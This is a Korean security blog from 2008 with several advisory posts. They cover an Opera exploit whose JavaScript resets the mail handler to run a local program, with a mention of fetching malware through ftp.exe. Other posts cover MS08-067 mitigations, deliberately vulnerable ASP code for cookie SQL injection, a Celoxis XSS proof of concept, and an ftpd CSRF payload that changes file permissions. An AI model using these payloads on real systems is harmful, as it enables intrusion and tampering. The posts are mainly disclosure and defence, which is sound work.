HTTP Proxy 변환 대신, 공격자는 "\\evil\malware.exe "나 로컬 명령으로 기본 외부 메일어플리케이션을 바꿀 수 있습니다.(예를 들면, 원격에서 악성 바이너리를 다운로드 하기 위해 사용될 수 있는 ftp.exe) “2”로 설정하여 “Mail Handler"를 바꾸면 오페라는 기본 오페라 메일 애플리케이션 대신 외부 메일 애플리케이션이 실행됩니다.

설정을 바꾼 후, 공격자는 간단하게 코드를 실행하기 위해 “mailto:”로 위치를 설정할 수 있습니다.

윈도우즈 계산기를 실행하는 소스를 다음 링크에서 찾을 수 있습니다.
http://raffon.net/research/opera/history/op.html

링크된 페이지로 가 소스코드를 보았더니 다음과 같습니다.
<html>
<title>bb</title>
<script>
var z=null;
function x() {
  window.setTimeout("z=window.open('opera:historysearch?q=%2A');window.focus();",1500);
  window.setTimeout("z.close();",3000);
  window.setTimeout("location.href='mailto:'",3000);
}
</script>
<body>
<a href="#<script src='
http://www.raffon.net/research/opera/history/o.js'></script>" target="_blank" onclick="x()">Click me...</a>
</body>
</html>



링크된 파일 o.js를 다운로드받아 들여다 보았더니 다음과 같았습니다.
s=document.createElement("IFRAME");
s.src="opera:config";
document.body.appendChild(s);
s.src="javascript:opera.setPreference('Mail','External Application','c:\\\\windows\\\\system32\\\\calc.exe');opera.setPreference('Mail','Handler','2');parent.window.close()";


위의 코드 실행으로 기본 메일 프로그램이 윈도우 계산기로 바뀌어 실행되는 것을 확인하였습니다.

최신 버전 9.61에서는 패치가 되었는지 되지 않네요.
Trackbacks 0 : Comments 0

Write a comment


MS08-067 취약점 업데이트 시급

ⓤ System 2008.10.27 08:42
좀 늦은 감이 있네요.

ms08-067에 관한 out-of-band의 긴급 패치가 릴리즈되고 나서 exploit가 millw0rm에 뜨면서 공격이 활성화되고 있습니다.

다들 긴급히 패치해주셔야겠네요.

다음 링크는 nchovy의 취약점에 관한 내용입니다.

오늘 MS08-067 긴급 패치가 발표되었습니다. 이번 취약점(CVE-2008-4250)은 Server Service가 RPC 요청을 제대로 처리하지 못해서 발생한 것으로, 2003/XP/2000/NT 운영체제에서 긴급, 2008/Vista 운영체제에서 중요 등급에 해당합니다.

비스타와 2008 서버에서는 주소 공간 레이아웃 랜덤화 (ASLR)데이터 실행 방지 (DEP) 때문에 익스플로잇이 어렵습니다. 게다가 UAC prompt를 꺼놓더라도 명명된 파이프(named pipe)를 사용하려고 할 때 UAC가 무결성 점검을 수행하므로 공격을 어렵게 합니다.

이미 익스플로잇(Win32/MS08067.gen!A)이 발견된 상태이고, 웜으로 발전할 가능성이 크므로 최대한 빨리 대응하시기 바랍니다. 마이크로소프트는 2주 전 XP 시스템을 대상으로 한 맬웨어의 공격을 분석하던 도중 이번 취약점을 발견했다고 합니다. 이 맬웨어 식별자는 TrojanSpy:Win32/Gimmiv.ATrojanSpy:Win32/Gimmiv.A.dll 입니다.

패치를 빨리 적용하시고, 외부에서 접근하지 못하도록 방화벽에서 139, 445 포트를 반드시 차단하시기 바랍니다. 다른 임시 대응책으로는 Computer Browser 서비스를 중지하는 방안이 있고, 비스타/2008의 경우에는 RPC 식별자를 기준으로 필터링이 가능합니다.

Computer Browser 서비스를 중지하게 되면 자신의 컴퓨터에 있는 파일이나 프린터를 공유할 수 없게 되지만, 다른 시스템의 공유 파일이나 프린터는 계속 사용할 수 있습니다.

비스타와 2008 서버의 경우에는 윈도우 기본 방화벽을 이용해서 RPC 식별자를 필터링할 수 있습니다. 이번 취약점에 관련해서는 UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188를 차단하시면 됩니다. 설정하려면 아래와 같이 진행하시면 됩니다.

netsh

먼저 위의 명령어를 쳐서 네트워크 쉘로 전환합니다.

netsh>rpc
netsh rpc>filter
netsh rpc filter>add rule layer=um actiontype=block
netsh rpc filter>add condition field=if_uuid matchtype=equal data=4b324fc8-1670-01d3-1278-5a47bf6ee188
netsh rpc filter>add filter
netsh rpc filter>quit

이렇게 치고 나면 방화벽 차단 정책이 설정됩니다. 다음 명령으로 제대로 설정되었는지 확인합니다.

netsh rpc filter show filter

제대로 설정되었다면 아래와 같은 화면이 보일 것입니다.

Listing all RPC Filters.
---------------------------------
filterKey: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
displayData.name: RPCFilter
displayData.description: RPC Filter
filterId: 0x12f79
layerKey: um
weight: Type: FWP_EMPTY Value: Empty
action.type: block
numFilterConditions: 1

filterKey는 랜덤하게 생성되는 식별자이니 신경쓰지 않으셔도 됩니다. 방화벽을 설정한 이후에 SMB 프로토콜에 의존하는 응용프로그램은 제대로 동작하지 않을 수 있습니다.

원래대로 되돌리려면 아래 명령으로 방화벽 정책을 삭제합니다.

netsh rpc filter delete filter xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx는 위에서 확인했던 filterKey입니다.

명명된 파이프의 접근을 제한하는 방법

공식적인 방법은 아니지만, SVRD에서 소개한 또 다른 임시 대응 방안이 하나 있습니다. 서버 서비스의 취약 지점을 공격하려면 명명된 파이프(named pipe)를 이용해야 합니다. 기본 접근 제한 정책은 netapi32.dll에 정의되어 있는데, advapi32.dll을 이용해서 명명된 파이프의 접근 제한을 변경할 수 있습니다. 다만, 현재 윈도우 세션에 적용되는 것 뿐이라 윈도우 재부팅 될 때마다 다시 설정해야 하는 문제가 있을 뿐입니다. RPC에 관련된 명명된 파이프에 익명 사용자가 접근할 수 없도록 제한하면, 익명 사용자로 공격하는게 아주 힘들어집니다. chacl.c 소스를 컴파일해서 아래와 같이 실행하면 됩니다.

C:\>chacl.exe \\.\pipe\srvsvc
opening up \\.\pipe\srvsvc
Got back 3 ACE entries
Found an entry for ANONYMOUS LOGON. Deleting it...
deleted that ACE

Setting new DACL changes...
Done

C:\>chacl.exe \\.\pipe\browser
opening up \\.\pipe\browser
Got back 3 ACE entries
Found an entry for ANONYMOUS LOGON. Deleting it...
deleted that ACE

Setting new DACL changes...
Done

'ⓤ System' 카테고리의 다른 글

ms08-067 취약점에 관한 FAQ  (0) 2008.10.29
ms08-067 소스 분석 및 실행(2008/10/23)  (0) 2008.10.27
MS08-067 취약점 업데이트 시급  (0) 2008.10.27
[Ubuntu]OpenSSH 취약점  (0) 2008.10.02
Debian/Ubuntu 계열 SSH 취약점 공격 도구 공개  (0) 2008.05.23
cold boot...  (0) 2008.03.10
Trackbacks 0 : Comments 0

Write a comment


cookie sql injection 원리와 대안

┃ Web 2008.10.22 14:47

요즘 쿠키인젝션 화제가 대두되고 있네요
쿠키인젝션에 원리를 간단히 설명드릴까합니다.
아래는 관련 코드입니다.


' InputFilter 함수는 입력값 검증을 위한 필터링 함수
' CheckLogin 함수는 아이디/비밀번호로 로그인 체크

1. 로그인 인증 성공후 쿠키 생성
<%
Dim UserID : UserID = InputFilter(Request.Form("UserID")) ' SQL Injection방어를 위해 InputFilter사용
Dim UserPW : UserPW = InputFilter(Request.Form("UserPW"))
Dim Result : Result = CheckLogin(UserID, UserPW)
If Result = True Then
Response.Cookies("www")("userid") = UserID
Else
Response.Write "인증실패"
End If
%>

2. 게시판 글쓰기하였을때 로그인한 사용자 아이디를 Writer 필드에 저장
<%
Dim Title : Title = InputFilter(Request.Form("Title")) ' SQL Injection방어를 위해 InputFilter사용
Dim Content : Content = InputFilter(Request.Form("Content")) ' SQL Injection방어를 위해 InputFilter사용
Dim Writer : Writer = Request.Cookies("www")("userid") ' 쿠키는 그대로 가져와서 사용 <-- 이부분이 필터링을 해주지 않아 문제가 됨

SQL = "Insert Into Board ("
SQL = SQL & "Title, Content, Writer "
SQL = SQL & ") Values ( "
SQL = SQL & " '" & Title & "', '" & Content & "', '" & Writer & "') "
Db.Execute SQL ' SQL Injection에 취약함!!
%>

개발자 자신들이 만든 쿠키는 안전하다는 생각으로, 생성된 쿠키를 이용하는 필드에서는 sql injection 문을 필터링하지 않는게 문제가 된다고 합니다.
통신 중간에 쿠키를 가로채서 변조하는 것이 가능한 만큼 이 문제가 발생하게 되는 것이죠

역시 생각의 발상이 달라야 한다고 느끼는 산뜻한 기법입니다..(옹호하는게 아님..ㅡㅡ;)

대안으로는 로깅설정에서 쿠키를 설정하거나 웹나이트 같은 웹방화벽에서 쿠키로깅을 설정합니다.
이 설정은 대부분 디폴트가 언체크이기 때문에 관리자가 관심을 가져야 겠습니다.
물론 이 로깅설정에 문제점을 꼬집자면 쿠키를 저장하는 것이기 때문에 cost가 많이 들겠죠
그래서 아예 처음부터 문제발생 요지를 없애는 거죠. 어떠케?


Dim Writer : Writer = InputFileter(Request.Cookies("www")("userid"))

요렇게..

Trackbacks 0 : Comments 0

Write a comment


Celoxis 프로젝트 관리 소프트웨어 XSS 취약점

┃ Application 2008.10.02 11:56

Celoxis는 기업이나 단체의 특별한 프로젝트, time sheets, 지출과 사업진행 등의 효율적인 관리와 협력을 향상시키기 위한 포괄적인 웹기반 프로젝트 관리자 툴이다.
문제는 이 소프트웨어가 URL에서 파라미터를 허락하고 파라미터의 내용을 보여주는 몇 개의 페이지들이 포함되어 있다. 이런 많은 파라미터들은 <script>를 포함하는 HTML태그들을 포함하고 그것들의 내용들이 대부분 걸러지지 않았다는 것이다.
이런 파라미터들은 엔드 유저에게 메세지를 보여주기 위해 소프트웨어에 의해 내부적으로 사용되는 것들이다. 이런 페이지들의 대부분은 오직 구독 간행물에서 접근이 가능하다.

하지만 다음 POC는 구독간행물 없이 접근될 수 있다.
http://asp1.celoxis.com/psa/user.do?bxn=umyhome&ni.smessage=XSS+goes+here+%3cscript%3ealert('XSS')%3c/script%3e

이 취약점은 사용자 인증없이 애플리케이션 안에서 임의의 객체를 조작하는데 사용될 수 있다. 객체는 프로젝트, 작업, 사용자, 기타 등을 포함한다. 이 취약점은 사용자가 그들 소유의 프로젝트를 삭제하도록 이용될 가능성이 있다.

2008-09-18: 초기 벤더에 알림Initial vendor notification
2008-09-18: 초기 벤더의 반응; 의심스러워했다.Initial vendor response; vendor disputed threat
2008-09-18: 벤더와 접촉
2008-09-23: 벤더와 접촉; 일주일 후에 공개
2008-09-30: 공개적으로 알려짐


: full-disclosure

Trackbacks 0 : Comments 0

Write a comment


[Ubuntu]OpenSSH 취약점

ⓤ System 2008.10.02 11:21


다음의 우분투 버젼에서 보안 문제가 대두되었습니다.

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10


이 문제는 Kubuntu, Edubuntu, Xubuntu에도 해당됩니다.
다음의 패키지 버젼으로 시스템을 업그레이드 하시면 해결됩니다.

Ubuntu 6.06 LTS:
 openssh-server                  1:4.2p1-7ubuntu3.5

Ubuntu 7.04:
 openssh-server                  1:4.3p2-8ubuntu1.5

Ubuntu 7.10:
 openssh-server                  1:4.6p1-5ubuntu0.6

ForceCommand 명령이 우회될 수 있는 취약점이 발견되었습니다.
로컬 사용자가 악성 ~/.ssh/rc 파일을 생성하면, 그들의 사용자 ID로 부정한 명령을 실행할 수 있습니다. 이 문제는 Ubuntu 7.10에만 해당됩니다.

USN-355-1는 OpenSSH의 취약점들을 수정했다. 이 문제에 대한 수정이 불완전하다는 것이 발견되었다. 원격 공격자는 다양한 로그인을 시도한다. 얻을 수 있는 모든 열려있는 포트를 채움으로써 DoS를 주도한다.

우분투 6.06과 7.04이 해당됩니다.

최신 버젼으로 업데이트하기 바랍니다.

'ⓤ System' 카테고리의 다른 글

ms08-067 소스 분석 및 실행(2008/10/23)  (0) 2008.10.27
MS08-067 취약점 업데이트 시급  (0) 2008.10.27
[Ubuntu]OpenSSH 취약점  (0) 2008.10.02
Debian/Ubuntu 계열 SSH 취약점 공격 도구 공개  (0) 2008.05.23
cold boot...  (0) 2008.03.10
MBR rootkit  (2) 2008.01.17
Trackbacks 0 : Comments 0

Write a comment


multiple vendor ftpd - Cross-site 요청 위조하기

┃ Application 2008.09.29 17:11

<해당 소프트웨어>

이 문제는 4.3에서 발견되었습니다.

- - 해당 시스템:

       + OpenBSD

       + NetBSD

       + FreeBSD

       + some linux

- - 해당 애플리케이션:

       + proFTPd

       + others

 

- --- 0. 설명 ---

ftpd -- 인터넷 파일 전송 프로토콜 서버(Internet File Transfer Protocol server)

 

ftpd 유틸리티는 Internet File Transfer Protocol server 프로세스이다. 서버는 TCP 프로토콜을 사용하고 -P옵션이나 "ftp" 서비스 명세서에서 지정한 포트로 listen한다.

 

sidejacking이나 session riding과 CSRF나 XSRF처럼 원클릭 공격으로 알려진 Cross-site요청 위조는 인증되지 않은 명령이 웹사이트 신뢰권한을 사용자로부터 건네 받는 웹사이트의 악성 공격 기법이다.

특정 사이트에 대해 사용자가 가지고 있는 신뢰권한을 이용하는 cross-site scripting(XSS)와는 대조적으로, cross-site 요청 위조는 특정 사용자에 대해 사이트가 가지고 있는 신뢰권한을 이용한다.

 

- --- 1. ftpd bsd - Cross-site 요청 위조 ---

 

주요 문제는 소수의 다른 것들을 위해 긴 명령을 분할하는 데에 있다. 문제는 for(;;) 루프와 fgets()함수를 사용하는 사실에서 기인한다.

 

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

 

이 명령은 아래와 같이 분할된다.

 

500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA': command
not understood.
500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA'

 

브라우져와 경로를 통해 ftp 데몬에 요청하는 명령이 512이상일 때, 우리의 URL은 분할된다.

 

/* FreeBSD 7.0 */

ftp://cxib@127.0.0.1///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST

SYST 명령으로부터 결과를 돌려받는다.:

215 UNIX Type: L8 Version: BSD-199506

 

 

/* NetBSD 4.0 */

ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST

SYST 명령으로부터 결과를 돌려받는다.:

215 UNIX Type: L8 Version: NetBSD-ftpd 20080609

위험해질 수 있는 경우는 이 버그가 CSRF 공격처럼 이용될 수 있다. 우리는 ftp 명령으로 파일의 권한이나 다른 조합을 바꾸기 위해 SITE CHMOD명령을 사용할 수 있다. 우리는 약간의 운이 필요할 뿐, 관리자는 공격당한 url를 실행할 것이다.

어떻게 이용하는가?

a. <img>태그로 몇 개의 html 파일을 생성하기

<img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">

..

b.

사용자를 대신하는 준비된 URL 입력

Example:

ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE

위 예는 소유주가 이 URL을 사용할 때 EXAMPLEFILE로 권한을 바꿀 것이다.

 

- --- 2. 고치는 방법 ---

OpenBSD가 가장 먼저 통보했다. Fix는 cvs에서 구할 수 있다.

http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c

http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/extern.h

http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y

NetBSD:

http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c

proFTPd:

http://bugs.proftpd.org/show_bug.cgi?id=3115

proFTPd:
http://bugs.proftpd.org/show_bug.cgi?id=3115

Trackbacks 0 : Comments 0

Write a comment


MacAfee SafeBoot Device Encryption 평문 패스워드 노출

┃ Application 2008.09.29 16:45
해당 소프트웨어는 MacAfee SafeBoot Device 암호화 v4, Build 4750 이하입니다.

 SafeBoot Device 암호화 루틴을 검사하는 패스워드가 패스워드를 읽은 후 BIOS 키보드 버퍼를 삭제하는 것이 실패합니다. 특권이 없는 로컬 사용자에게 평문 패스워드가 노출되는 결과를 가져 옵니다.

해당되지 않는 소프트웨어는 MacAfee SafeBoot Device Encryption v4, Build 4760 이상, MacAfee SafeBoot Device Encryption v5.x이므로 해결법은? 당연히 업데이트겠지요..:)
Trackbacks 0 : Comments 0

Write a comment


xss 당한 사이트 정보 보기

『Link』 관련사이트 2008.09.28 15:13


www.xssed.org

이 사이트는 zone-h와 같이 해커들이 xss 취약점 공격을 하여 포인트를 얻어 경쟁하는 곳입니다.

'what is XSS'에 가보면 xss에 대한 자세한 설명도 있네요.

참고하세요.

'『Link』 관련사이트' 카테고리의 다른 글

암호복구 툴 무료 다운로드 사이트  (0) 2009.03.26
nchovy  (1) 2008.10.02
xss 당한 사이트 정보 보기  (0) 2008.09.28
파일 시스템  (0) 2008.05.15
packer 사이트  (0) 2008.01.04
hackeroo.com  (0) 2008.01.04
Trackbacks 0 : Comments 0

Write a comment


wireshark 1.0.3 취약점 발견

┃ Application 2008.09.27 12:58

와이어 샤크 1.0.3에서 몇가지 취약점이 발견 되었네요.

아래는 보고된 취약점입니다. 여기서 버퍼오버플로우 취약점은 리눅스에서는 위험하다고 생각이 드네요.

* Multiple buffer overflows in the NCP dissector (CVE-2008-3146).

* Infinite loop in the NCP dissector (CVE-2008-3932).

* Invalid read in the tvb_uncompress() function when processing zlib
   compressed data (CVE-2008-3933).

* Unspecified error when processing Textronix .rf5 files
   (CVE-2008-3934).


원격 공격자는 와이어샤크에 의해 모니터링 되고 있는 네트워크에 공격을 위해 특별히 만든 패킷들을 보내거나 악의적인 패킷 트레이스 파일을 읽도록 사용자들을 유혹함으로써 이런 취약점들을 공격할 수 있다고 합니다. 이는 DoS를 야기한다고 하네요.

해결법으로 최신버젼으로 업그레이드 하라는데 현재 최신버젼의 바로 하위버젼이 1.0.3인 걸로 봐서 이 소식을 접하지 않은 사용자들은 위험에 노출될 수 있겠네요.
Trackbacks 0 : Comments 0

Write a comment